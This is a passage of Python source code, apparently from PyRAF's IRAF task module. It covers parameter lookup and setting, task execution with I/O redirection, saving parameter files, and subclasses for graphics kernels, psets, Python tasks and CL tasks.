self._tbflag\n\n def getForeign(self):\n return self._foreign\n\n def getFilename(self):\n return self._filename\n\n # ---------------------------------------------------------\n # second set initializes task variables (which were deferred to\n # speed up initial instance creation)\n # ---------------------------------------------------------\n\n def getFullpath(self):\n \"\"\"Return full path name of executable\"\"\"\n self.initTask()\n return self._fullpath\n\n def getParpath(self):\n \"\"\"Return full path name of parameter file\"\"\"\n self.initTask()\n return self._currentParpath\n\n def getParList(self, docopy=0):\n \"\"\"Return list of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n return plist.getParList(docopy=docopy)\n else:\n return []\n\n def getDefaultParList(self):\n \"\"\"Return default list of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._defaultParList\n if plist:\n return plist.getParList()\n else:\n return []\n\n def getParDict(self):\n \"\"\"Return (min-match) dictionary of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n return plist.getParDict()\n else:\n return minmatch.MinMatchDict()\n\n def getParObject(self, paramname, exact=0, alldict=0):\n \"\"\"Get the IrafPar object for a parameter\n\n If exact is set, param name must match exactly.\n If alldict is set, look in all dictionaries (default is\n just this task's dictionaries.)\n \"\"\"\n self.initTask()\n\n # search the standard dictionaries for the parameter\n # most of the time it will be in the active task dictionary\n try:\n paramdict = self.getParDict()\n if paramdict._has(paramname, exact=exact):\n return paramdict[paramname]\n except minmatch.AmbiguousKeyError as e:\n # re-raise the error with a bit more info\n raise IrafError(f\"Cannot get parameter `{paramname}'\\n{str(e)}\")\n\n if alldict:\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n return paramdict[paramname]\n\n raise IrafError(\"Unknown parameter requested: \" + paramname)\n\n def getAllMatches(self, param):\n \"\"\"Return list of names of all parameters that may match param\"\"\"\n self.initTask(force=1)\n plist = 
self._runningParList or self._currentParList\n if plist:\n return plist.getAllMatches(param)\n else:\n return []\n\n # ---------------------------------------------------------\n # modify and test attributes\n # ---------------------------------------------------------\n\n def addPkgbinary(self, pkgbinary):\n \"\"\"Add another entry in list of possible package binary locations\n\n Parameter can be a string or a list of strings\"\"\"\n\n if not pkgbinary:\n return\n elif isinstance(pkgbinary, str):\n if pkgbinary and (pkgbinary not in self._pkgbinary):\n self._pkgbinary.append(pkgbinary)\n else:\n for pbin in pkgbinary:\n if pbin and (pbin not in self._pkgbinary):\n self._pkgbinary.append(pbin)\n\n def setHidden(self, value=1):\n \"\"\"set hidden attribute, which can be specified in\n a separate 'hide' statement\n \"\"\"\n self._hidden = value\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n return self.__class__ == other.__class__ and \\\n self.getFilename() == other.getFilename() and \\\n self.hasParfile() == other.hasParfile() and \\\n self.getForeign() == other.getForeign() and \\\n self.getTbflag() == other.getTbflag()\n\n # ---------------------------------------------------------\n # run the task\n # ---------------------------------------------------------\n\n def run(self, *args, **kw):\n \"\"\"Execute this task with the specified arguments\"\"\"\n\n self.initTask(force=1)\n\n # Special _save keyword turns on parameter-saving.\n # Default is *not* to save parameters (so it is necessary\n # to use _save=1 to get parameter changes to be persistent.)\n if '_save' in kw:\n save = kw['_save']\n del kw['_save']\n else:\n save = 0\n\n # Handle other special keywords\n specialKW = self._specialKW(kw)\n\n # Special Stdout, Stdin, Stderr keywords are used to redirect IO\n redirKW, closeFHList = iraf.redirProcess(kw)\n\n # Set parameters ...\n # The setParList call sets _runningParList, which is a copy that is\n # only intended to live for the lifetime of the running task. 
The\n # _currentParList version lives longer - it represents the on-disk\n # copy of the par list, during the life of this PyRAF session.\n kw['_setMode'] = 1\n self.setParList(*args, **kw)\n\n if Verbose > 1:\n print(f\"run {self._name} ({self.__class__.__name__}: \"\n f\"{self._fullpath})\", file=sys.stderr)\n if self._runningParList:\n self._runningParList.lParam()\n\n # delete list of param dictionaries so it will be\n # recreated in up-to-date version if needed\n self._parDictList = None\n # apply IO redirection\n resetList = self._applyRedir(redirKW)\n try:\n # Hook for execution monitor\n if executionMonitor:\n executionMonitor(self)\n self._run(redirKW, specialKW)\n self._updateParList(save)\n if Verbose > 1:\n print('Successful task termination', file=sys.stderr)\n finally:\n rv = self._resetRedir(resetList, closeFHList)\n self._deleteRunningParList()\n if self._parDictList:\n self._parDictList[0] = (self._name, self.getParDict())\n if executionMonitor:\n executionMonitor()\n return rv\n\n def getMode(self, parList=None):\n \"\"\"Returns mode string for this task\n\n Searches up the task, package, cl hierarchy for automatic modes\n \"\"\"\n if parList is not None:\n mode = parList.getValue('mode', prompt=0)\n else:\n pdict = self.getParDict()\n if pdict:\n mode = pdict['mode'].get(prompt=0)\n else:\n mode = \"a\"\n if mode[:1] != \"a\":\n return mode\n\n # cl is the court of last resort, don't look at its packages\n if self is iraf.cl:\n return \"h\"\n\n # package name is undefined only at very start of initialization\n # just use the standard default\n if not self._pkgname:\n return \"ql\"\n\n # up we go -- look in parent package\n pkg = iraf.getPkg(self._pkgname)\n # clpackage is at top and is its own parent\n if pkg is not self:\n return pkg.getMode()\n # didn't find it in the package hierarchy, so use cl mode\n mode = iraf.cl.mode\n # default is hidden if automatic all the way to top\n if mode[:1] == \"a\":\n return \"h\"\n else:\n return mode\n\n def setParList(self, *args, **kw):\n \"\"\"Set arguments to task in _runningParList copy of par list\n\n Creates a copy of the task parameter list and sets the\n parameters. 
It is up to subsequent code (in the run method)\n to propagate these changes to the persistent parameter list.\n\n Special arguments:\n _setMode=1 to set modes of automatic parameters\n ParList can be used to pass in an entire parameter list object\n \"\"\"\n self.initTask(force=1)\n\n if self._currentParList is None:\n return None\n\n # Special ParList parameter is used to pass in an entire\n # parameter list\n if 'ParList' in kw:\n parList = kw['ParList']\n del kw['ParList']\n if isinstance(parList, str):\n # must be a .par filename\n filename = parList\n parList = irafpar.IrafParList(self.getName(), filename)\n elif parList and not isinstance(parList, irafpar.IrafParList):\n raise TypeError(\"ParList parameter must be a filename or \"\n \"an IrafParList object\")\n else:\n parList = None\n\n if self._runningParList is not None:\n # only one runningParList at a time -- all tasks use it\n newParList = self._runningParList\n parList = None\n else:\n if parList:\n newParList = copy.deepcopy(parList)\n else:\n newParList = copy.deepcopy(self._currentParList)\n\n if '_setMode' in kw:\n _setMode = kw['_setMode']\n del kw['_setMode']\n else:\n _setMode = 0\n\n # create parlist copies for pset tasks too\n for p in newParList.getParList():\n if isinstance(p, irafpar.IrafParPset):\n p.get().setParList()\n\n # now, finally, set the passed-in parameters\n newParList.setParList(*args, **kw)\n if _setMode:\n # set mode of automatic parameters\n mode = self.getMode(newParList)\n for p in newParList.getParList():\n p.mode = p.mode.replace(\"a\", mode)\n if parList:\n # XXX Set all command-line flags for parameters when a\n # XXX parlist is supplied so that it does not prompt for\n # XXX missing parameters. Is this the preferred behavior?\n newParList.setAllFlags()\n\n self._runningParList = newParList\n\n # ---------------------------------------------------------\n # task parameter access\n # ---------------------------------------------------------\n\n def setParam(self,\n qualifiedName,\n newvalue,\n check=1,\n exact=0,\n scope='',\n idxHint=None):\n \"\"\"Set parameter specified by qualifiedName to newvalue.\n\n qualifiedName can be a simple parameter name or can be\n [[package.]task.]paramname[.field].\n If check is set to zero, does not check value to make sure it\n satisfies min-max range or choice list. scope, idxHint are ignored.\n \"\"\"\n\n package, task, paramname, pindex, field = _splitName(qualifiedName)\n\n # special syntax for package parameters\n if task == \"_\":\n task = self._pkgname\n\n if task or package:\n if not package:\n # maybe this task is the name of one of the dictionaries?\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if dictname == task:\n if paramname in paramdict:\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n else:\n raise IrafError(\n \"Attempt to set unknown parameter \" +\n qualifiedName + ' for task ' + task)\n # Not one of our dictionaries, so must find the relevant task\n if package:\n task = package + '.' + task\n try:\n tobj = iraf.getTask(task)\n # reattach the index and/or field\n if pindex:\n paramname = paramname + '[' + repr(pindex + 1) + ']'\n if field:\n paramname = paramname + '.' 
+ field\n tobj.setParam(paramname, newvalue, check=check)\n return\n except KeyError:\n raise IrafError(\"Could not find task \" + task +\n \" to get parameter \" + qualifiedName)\n except IrafError as e:\n raise IrafError(\n str(e) + \"\\nFailed to set parameter \" + qualifiedName)\n\n # no task specified, just search the standard dictionaries\n # most of the time it will be in the active task dictionary\n\n paramdict = self.getParDict()\n if paramdict._has(paramname, exact=exact):\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n else:\n raise IrafError(\"Attempt to set unknown lone parameter \" +\n qualifiedName)\n\n def getParam(self, qualifiedName, native=1, mode=None, exact=0, prompt=1):\n \"\"\"Return parameter specified by qualifiedName.\n\n qualifiedName can be a simple parameter name or can be\n [[package.]task.]paramname[.field].\n Paramname can also have an optional subscript, \"param[1]\".\n If native is non-zero (default), returns native format (e.g. float\n for floating point parameter.), otherwise returns string value.\n If exact is set, parameter name must match exactly. Default\n is to do minimum match.\n If prompt is 0, does not prompt for parameter value (even if\n parameter is undefined.)\n \"\"\"\n\n # DBG \"GP:\", str(self._name), qualifiedName, native, mode, exact, prompt\n package, task, paramname, pindex, field = _splitName(qualifiedName)\n\n if (not task) or (task == self._name):\n # no task specified, just search the standard dictionaries\n return self._getParValue(paramname,\n pindex,\n field,\n native,\n mode,\n exact=exact,\n prompt=prompt)\n\n # when task is specified, ignore exact flag -- always do minmatch\n\n # special syntax for package parameters\n if task == \"_\":\n task = self._pkgname\n\n if not package:\n # maybe this task is the name of one of the dictionaries?\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if dictname == task:\n if paramname in paramdict:\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n else:\n raise IrafError(\"Unknown parameter requested: \" +\n qualifiedName)\n\n # Not one of our dictionaries, so must find the relevant task\n if package:\n task = package + '.' 
+ task\n try:\n tobj = iraf.getTask(task)\n return tobj._getParValue(paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n except KeyError:\n raise IrafError(\"Could not find task \" + task +\n \" to get parameter \" + qualifiedName)\n except IrafError as e:\n raise IrafError(\n str(e) + \"\\nFailed to get parameter \" + qualifiedName)\n\n def _getParValue(self,\n paramname,\n pindex,\n field,\n native,\n mode,\n exact=0,\n prompt=1):\n # search the standard dictionaries for the parameter\n # most of the time it will be in the active task dictionary\n paramdict = self.getParDict()\n try:\n if paramdict._has(paramname, exact=exact):\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=mode,\n prompt=prompt)\n except minmatch.AmbiguousKeyError as e:\n # re-raise the error with a bit more info\n raise IrafError(f\"Cannot get parameter `{paramname}'\\n{str(e)}\")\n\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n else:\n raise IrafError(f'Unknown parameter requested: \"{paramname}\" '\n f'for task: \"{self._name}\" '\n f'in pkg: \"{self._pkgname}\"')\n\n # ---------------------------------------------------------\n # task parameter utility methods\n # ---------------------------------------------------------\n\n def lParam(self, verbose=0):\n \"\"\"List the task parameters\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n plist.lParam(verbose=verbose)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def eParam(self):\n \"\"\"Edit the task parameters, PyRAF Tk style\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if self._currentParList:\n from . import epar\n epar.epar(self)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def tParam(self):\n \"\"\"Edit the task parameters, IRAF curses style\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if self._currentParList:\n from . 
import tpar\n tpar.tpar(self)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def dParam(self, cl=1):\n \"\"\"Dump the task parameters\n\n Default is to write CL version of code; if cl parameter is\n false, writes Python executable code instead.\n \"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n if cl:\n taskname = self._name\n else:\n taskname = f\"iraf.{self._name}\"\n plist.dParam(taskname, cl=cl)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def saveParList(self, filename=None, comment=None):\n \"\"\"Write task parameters in .par format to filename (name or handle)\n\n If filename is omitted, writes to uparm scrunch file (if possible)\n Returns a string with the results.\n \"\"\"\n self.initTask()\n # XXX always runs on current par list, not running par list?\n if not self._currentParList:\n return f\"No parameters to save for task {self._name}\"\n if filename is None:\n if self._scrunchParpath:\n filename = self._scrunchParpath\n else:\n status = f\"Unable to save parameters for task {self._name}\"\n if Verbose > 0:\n print(status, file=sys.stderr)\n return status\n rv = self._currentParList.saveParList(filename, comment)\n return rv\n\n def unlearn(self):\n \"\"\"Reset task parameters to their default values\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if not self._currentParList:\n return\n if self._defaultParList is not None:\n # update defaultParList from file if necessary\n self._defaultParList.Update()\n if self._scrunchParpath and \\\n (self._scrunchParpath == self._currentParpath):\n try:\n os.remove(iraf.Expand(self._scrunchParpath, noerror=1))\n except OSError:\n pass\n self._currentParList = copy.deepcopy(self._defaultParList)\n self._currentParpath = self._defaultParpath\n else:\n raise IrafError(\"Cannot find default .par file for task \" +\n self._name)\n\n def scrunchName(self):\n \"\"\"Return scrunched version of filename (used for uparm files)\n\n Scrunched version of filename is chars 1,2,last from package\n name and chars 1-5,last from task name.\n \"\"\"\n s = self._pkgname[0:2]\n if len(self._pkgname) > 2:\n s = s + self._pkgname[-1:]\n s = s + self._name[0:5]\n if len(self._name) > 5:\n s = s + self._name[-1:]\n return s\n\n # =========================================================\n # special methods to give desired object syntax\n # =========================================================\n\n # parameters are accessible as attributes\n\n def __getattr__(self, name):\n if name[:1] == '_':\n raise AttributeError(name)\n self.initTask()\n try:\n return self.getParam(name, native=1)\n except SyntaxError as e:\n raise AttributeError(str(e))\n\n def __setattr__(self, name, value):\n # hidden Python parameters go into the standard dictionary\n # (hope there are none of these in IRAF tasks)\n if name[:1] == '_':\n self.__dict__[name] = value\n elif self.is_pseudo(name):\n self.__dict__[name] = value\n else:\n self.initTask()\n self.setParam(name, value)\n\n def is_pseudo(self, paramname):\n \"\"\"Hook enabling ECL pseudos... 
always returns False\"\"\"\n return False\n\n # allow running task using taskname() or with\n # parameters as arguments, including keyword=value form.\n\n def __call__(self, *args, **kw):\n return self.run(*args, **kw)\n\n def __repr__(self):\n s = (f'<{self.__class__.__name__} {self._name} ({self._filename}) '\n f'Pkg: {self._pkgname} Bin: {\":\".join(self._pkgbinary)}')\n if self._foreign:\n s = s + ' Foreign'\n if self._hidden:\n s = s + ' Hidden'\n if self._hasparfile == 0:\n s = s + ' No parfile'\n if self._tbflag:\n s = s + ' .tb'\n return s + '>'\n\n def __str__(self):\n return repr(self)\n\n # =========================================================\n # private methods -- may be used by subclasses, but should\n # not be needed outside this module\n # =========================================================\n\n def _specialKW(self, kw):\n \"\"\"Return dictionary of any special keywords (subclass hook)\"\"\"\n return {}\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection (irafexecute does this for executables)\n\n Return a list of redirections that need to be restored when done.\n \"\"\"\n return []\n\n def _resetRedir(self, resetList, closeFHList):\n \"\"\"Restore redirected I/O and close files\"\"\"\n return iraf.redirReset(resetList, closeFHList)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\n\n The implementation of this can differ for each type of task.\n \"\"\"\n try:\n irafexecute.IrafExecute(self, iraf.getVarDict(), **redirKW)\n except irafexecute.IrafProcessError as value:\n raise IrafError(\"Error running IRAF task \" + self._name + \"\\n\" +\n str(value))\n\n def _updateParList(self, save=0):\n \"\"\"Update parameter list after successful task completion\n\n Updates parameter save file if any parameters change. 
If save\n flag is set, all changes are saved; if save flag is false, only\n explicit parameter changes requested by the task are saved.\n \"\"\"\n if not (self._currentParList and self._runningParList):\n return\n newParList = self._runningParList\n self._runningParList = None\n mode = self.getMode(newParList)\n changed = 0\n for par in newParList.getParList():\n if par.name != \"$nargs\" and (par.isChanged() or\n (save and par.isCmdline() and\n par.isLearned(mode))):\n changed = 1\n # get task parameter object\n tpar = self._currentParList.getParObject(par.name)\n # set its value -- don't bother with type checks since\n # the new and old parameters must be identical\n tpar.value = par.value\n # propagate other mutable fields too\n # don't propagate modes since I changed them\n # (note IRAF does not propagate prompt, which I consider a bug)\n tpar.min = par.min\n tpar.max = par.max\n tpar.choice = par.choice\n tpar.prompt = par.prompt\n tpar.setChanged()\n if isinstance(par, irafpar.IrafParPset):\n par.get()._updateParList(save)\n # save to disk if there were changes\n if changed:\n rv = self.saveParList()\n if Verbose > 1:\n print(rv, file=sys.stderr)\n\n def _deleteRunningParList(self):\n \"\"\"Delete the _runningParList parameter list for this and psets\"\"\"\n if self._currentParList and self._runningParList:\n newParList = self._runningParList\n self._runningParList = None\n for par in newParList.getParList():\n if isinstance(par, irafpar.IrafParPset):\n par.get()._deleteRunningParList()\n\n def _setParDictList(self):\n \"\"\"Set the list of (up to 3) parameter dictionaries for task execution.\n\n Parameter dictionaries for execution consist of this\n task's parameters (which includes any psets\n referenced), all the parameters for the task of the package\n loaded for the current task, and the cl parameters. Each\n dictionary has an associated name (because parameters could be\n asked for as task.parname as well as just parname).\n\n Create this list anew for each execution in case the\n list of loaded packages has changed. It is stored as\n an attribute of this object so it can be accessed by\n the getParam() and setParam() methods.\n \"\"\"\n\n # Start with the parameters for the current task\n self.initTask()\n parDictList = [(self._name, self.getParDict())]\n\n # Next, parameters from the package to which the current task belongs\n # [Ticket 59: mimic behavior of param.c:lookup_param()]\n task = iraf.getTask(self.getPkgname())\n pd = task.getParDict()\n if pd: # do not include null dictionaries\n parDictList.append((self.getPkgname(), pd))\n\n # Lastly, cl parameters\n cl = iraf.cl\n if cl is not None:\n parDictList.append((cl.getName(), cl.getParDict()))\n\n # Done\n self._parDictList = parDictList\n\n def _getParFromDict(self, paramdict, paramname, pindex, field, native,\n mode, prompt):\n # helper method for getting parameter value (with indirection)\n # once we find a dictionary that contains it\n par = paramdict[paramname]\n pmode = par.mode[:1]\n if pmode == \"a\":\n pmode = mode or self.getMode()\n v = par.get(index=pindex,\n field=field,\n native=native,\n mode=pmode,\n prompt=prompt)\n if isinstance(v, str) and v[:1] == \")\":\n\n # parameter indirection: call getParam recursively\n # I'm making the assumption that indirection in a\n # field (e.g. in the min or max value) is allowed\n # and that it uses exactly the same syntax as\n # the argument to getParam, i.e. 
')task.param'\n # refers to the p_value of the parameter,\n # ')task.param.p_min' refers to the min or\n # choice string, etc.\n\n return self.getParam(v[1:], native=native, mode=\"h\", prompt=prompt)\n else:\n return v\n\n def _initFullpath(self):\n \"\"\"Fill in full pathname of executable\"\"\"\n\n # This follows the search strategy used by findexe in\n # cl/exec.c: first it checks in the BIN directory for the\n # \"installed\" version of the executable, and if that is not\n # found it tries the pathname given in the TASK declaration.\n # Expand iraf variables. We will try both paths if the expand fails.\n try:\n exename1 = iraf.Expand(self._filename)\n # get name of executable file without path\n basedir, basename = os.path.split(exename1)\n except IrafError as e:\n if Verbose > 0:\n print(\"Error searching for executable for: \" + self._name,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n exename1 = \"\"\n # make our best guess that the basename is what follows the\n # last '$' in _filename\n s = self._filename.split(\"$\")\n basename = s[-1]\n if basename == \"\":\n self._fullpath = \"\"\n raise IrafError(f\"No filename in task {self._name} definition: \"\n f\"`{self._filename}'\")\n # for foreign tasks, just set path to filename (XXX will\n # want to improve this by checking os path for existence)\n if self._foreign:\n self._fullpath = self._filename\n else:\n # first look in the task binary directories\n exelist = []\n for pbin in self._pkgbinary: # e.g. ['bin$']\n try:\n exelist.append(iraf.Expand(pbin + basename))\n except IrafError as e:\n if Verbose > 0:\n print(\"Error finding executable for: \" + self._name,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n for exename2 in exelist:\n if os.path.exists(exename2):\n self._fullpath = exename2\n break\n else:\n if os.path.exists(exename1):\n self._fullpath = exename1\n else:\n self._fullpath = \"\"\n exelist.append(exename1)\n raise IrafError(\n f\"Cannot find executable for task {self._name}\\n\"\n f\"Tried \" + \", \".join(exelist))\n\n def _initParpath(self):\n \"\"\"Initialize parameter file paths\"\"\"\n\n if not self._filename:\n # if filename is missing we won't be able to find parameter file\n # set hasparfile flag to zero if that is OK\n self._noParFile()\n self._hasparfile = 0\n\n if not self._hasparfile:\n # no parameter file\n self._defaultParpath = \"\"\n self._currentParpath = \"\"\n self._scrunchParpath = \"\"\n return\n\n try:\n exename1 = iraf.Expand(self._filename)\n basedir, basename = os.path.split(exename1)\n if basedir == \"\":\n basedir = \".\"\n except IrafError as e:\n if Verbose > 0:\n print(\"Error expanding executable name for task \" +\n self._name + \", tried: \" + self._filename,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n exename1 = \"\"\n basedir = \"\"\n\n # default parameters are found with task\n self._defaultParpath = os.path.join(basedir, self._name + \".par\")\n if not os.path.exists(iraf.Expand(self._defaultParpath, noerror=1)):\n self._noParFile()\n self._defaultParpath = \"\"\n\n # uparm has scrunched version of par filename with saved parameters\n # (also handle if they forgot the end-slash on the uparm var)\n self._scrunchParpath = \"uparm$/\" + self.scrunchName() + \".par\"\n\n def _noParFile(self):\n \"\"\"Decide what to do if .par file is not found\"\"\"\n # Here I raise an exception, but subclasses (e.g., CL tasks)\n # can do something different.\n raise IrafError(\"Cannot find .par file for task \" + self._name +\n \", tried: \" + self._defaultParpath + \", for 
file: \" +\n self._filename)\n\n def _initParList(self):\n \"\"\"Initialize parameter list by reading parameter file\"\"\"\n\n if not self._hasparfile:\n return\n\n self._defaultParList = irafpar.IrafParList(\n self._name, iraf.Expand(self._defaultParpath, noerror=1))\n\n codePath = 'a'\n if self._scrunchParpath and os.path.exists(\n iraf.Expand(self._scrunchParpath, noerror=1)):\n self._currentParpath = self._scrunchParpath\n self._currentParList = irafpar.IrafParList(\n self._name, iraf.Expand(self._currentParpath, noerror=1))\n # are lists consistent?\n if not self._isConsistentPar():\n sys.stderr.write(\"uparm parameter list \"\n f\"`{self._currentParpath}' inconsistent with \"\n \"default parameters for \"\n f\"{self.__class__.__name__} `{self._name}'\\n\")\n sys.stderr.flush()\n # XXX just toss it for now -- later can try to merge new,old\n try:\n os.remove(iraf.Expand(self._scrunchParpath, noerror=1))\n except OSError:\n pass\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n else:\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n codePath = 'b'\n\n assert self._defaultParList._dlen() == \\\n self._currentParList._dlen(), \"Bad deep copy? \"+ \\\n str(self._defaultParList._dlen())+\" != \"+ \\\n str(self._currentParList._dlen())+\", cpath=\"+codePath\n\n def _isConsistentPar(self):\n \"\"\"Check current par list and default par list for consistency\"\"\"\n return (not self._currentParList) or \\\n self._currentParList.isConsistent(self._defaultParList)\n\n\n# -----------------------------------------------------\n# IRAF graphics kernel class\n# -----------------------------------------------------\n\n\nclass IrafGKITask(IrafTask):\n \"\"\"IRAF graphics kernel class (special case of IRAF task)\"\"\"\n\n def __init__(self, name, filename):\n \"\"\"Initialize: only name and executable filename are needed\"\"\"\n IrafTask.__init__(self, '', name, '', filename, 'clpackage', 'bin$')\n self.setHidden()\n # all graphics kernel tasks have the same parameters\n pars = irafpar.IrafParList(name)\n makepar = irafpar.makeIrafPar\n pars.addParam(makepar('', datatype='string', name='input', mode='ql'))\n pars.addParam(makepar('', datatype='string', name='device', mode='h'))\n pars.addParam(makepar('yes', datatype='bool', name='generic',\n mode='h'))\n self._defaultParList = pars\n self._currentParList = pars\n\n def saveParList(self, filename=None):\n \"\"\"Never save parameters for kernels\"\"\"\n return \"\"\n\n\n# -----------------------------------------------------\n# IRAF Pset class\n# -----------------------------------------------------\n\n\nclass IrafPset(IrafTask):\n \"\"\"IRAF pset class (special case of IRAF task)\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n # check that parameters are consistent with pset:\n # - not a foreign task\n # - has a parameter file\n if self.getForeign():\n raise IrafError(\n f\"Bad filename for pset {self.getName()}: {filename}\")\n if not self.hasParfile():\n raise KeyError(f\"Pset {self.getName()} has no parameter file\")\n\n def _run(self, redirKW, specialKW):\n # executing a pset\n self.eParam() # the cl runs the param editor here; so shall we\n\n def __str__(self):\n # when coerced to a string, pset is name of task\n # this makes assignment of a pset to a string do the right thing\n return self.getName()\n\n\n# 
-----------------------------------------------------\n# IRAF Python task class\n# -----------------------------------------------------\n\n\nclass IrafPythonTask(IrafTask):\n \"\"\"IRAF Python task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary,\n function):\n # filename is the .par file for this task\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n if self.getForeign():\n raise IrafError(f\"Python task `{self.getName()}' cannot be foreign\"\n f\" (filename=`{filename}')\")\n self.__dict__['_pyFunction'] = function\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n return IrafTask.isConsistent(self, other) and \\\n self._pyFunction == other._pyFunction\n\n # =========================================================\n # special methods\n # =========================================================\n\n def __getstate__(self):\n \"\"\"Return state for pickling\n\n Note that __setstate__ is not needed because\n returned state is a dictionary\n \"\"\"\n\n # Dictionary is OK except for function pointer, which can't\n # be restored unless function is in the pyraf package\n if self._pyFunction is None:\n return self.__dict__\n try:\n module = self._pyFunction.__globals__['__name__']\n if module[:6] == 'pyraf.':\n return self.__dict__\n except KeyError:\n pass\n # oh well, replace _pyFunction in shallow copy of dictionary\n sdict = self.__dict__.copy()\n sdict['_pyFunction'] = None\n return sdict\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n # extract all parameters\n parList = self.getParList()\n pl = []\n for par in parList:\n if par.name not in ['mode', '$nargs']:\n if isinstance(par, irafpar.IrafParL):\n # list parameters get passed as objects\n pl.append(par)\n elif par.mode == \"h\" and not par.isLegal():\n # illegal hidden value (generally undefined) passed as None\n pl.append(None)\n else:\n # other parameters get passed by value\n pl.append(par.get(native=1))\n # run function on the parameters\n self._pyFunction(*pl)\n\n\n# -----------------------------------------------------\n# parDictList search class (helper for IrafCLTask)\n# -----------------------------------------------------\n\n\nclass ParDictListSearch:\n\n def __init__(self, taskObj):\n self.__dict__['_taskObj'] = taskObj\n\n def __getattr__(self, paramname):\n if self._taskObj.is_pseudo(paramname):\n return getattr(self._taskObj, paramname)\n if paramname[:1] == '_':\n raise AttributeError(paramname)\n # try exact match\n try:\n return self._taskObj.getParam(paramname,\n native=1,\n mode=\"h\",\n exact=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n def getParObject(self, paramname):\n # try exact match\n try:\n return self._taskObj.getParObject(paramname, exact=1, alldict=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = 
self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n def __setattr__(self, paramname, value):\n if self._taskObj.is_pseudo(paramname):\n return setattr(self._taskObj, paramname, value)\n if paramname[:1] == '_':\n raise AttributeError(paramname)\n # try exact match\n try:\n return self._taskObj.setParam(paramname, value, exact=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n\n# -----------------------------------------------------\n# IRAF CL task class\n# -----------------------------------------------------\n\n\nclass IrafCLTask(IrafTask):\n \"\"\"IRAF CL task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n # allow filename to be a filehandle or a filename\n if isinstance(filename, str):\n fh = None\n else:\n if not hasattr(filename, 'read'):\n raise TypeError(\n 'filename must be either a string or a filehandle')\n fh = filename\n if hasattr(fh, 'name'):\n filename = fh.name\n else:\n filename = None\n IrafTask.__init__(self, prefix, name, suffix, filename, 